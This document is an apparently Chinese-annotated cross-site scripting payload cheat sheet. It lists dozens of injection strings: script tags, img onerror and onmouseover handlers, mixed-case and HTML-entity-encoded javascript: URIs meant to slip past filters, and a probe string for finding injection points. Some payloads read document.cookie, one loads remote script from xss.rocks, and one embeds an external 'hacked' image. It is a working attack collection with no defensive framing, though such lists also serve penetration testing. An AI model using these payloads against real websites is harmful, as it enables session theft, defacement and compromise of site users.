如果在参数中，同个通过%20(url编码)代替

”;!–“<XSS>=&{()}

<SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>

‘”>><marquee><img src=x onerror=confirm(1)></marquee>”></plaintext\></|\><plaintext/onmouseover=prompt(1)>
<script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>’–>”></script>
<script>alert(document.cookie)</script>”>
<img/id=”confirm&lpar;1)”/alt=”/”src=”/”onerror=eval(id)>'”>
<img src=”http://www.shellypalmer.com/wp-content/images/2015/07/hacked-compressor.jpg”>
‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;
alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–
></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

<ImG SrC=JaVaScRiPt:alert(‘XsS’)>
<ImG SrC=javascript:alert(String.fromCharCode(88,83,83))>
<ImG SrC=”URL” StYlE=’Xss:expression(alert(/xss/));’>
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
<IMG SRC=javascript:alert(“RSnake says, ‘XSS'”)>
<a onmouseover="alert(document.cookie)">xss link</a>
<a onmouseover=alert(document.cookie)>xss link</a>

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">


<IMG onmouseover="alert('xxs')">
<IMG SRC= onmouseover="alert('xxs')">
<IMG SRC=# onmouseover="alert('xxs')">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>

## 编码绕过
<img src=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">

## 十进制
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;
&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

<IMG SRC="jav ascript:alert('XSS');">


xss探针:';`"><aaa bbb=ccc>ddd<aaa/>
经典<img src=x onerror=alert(1)>
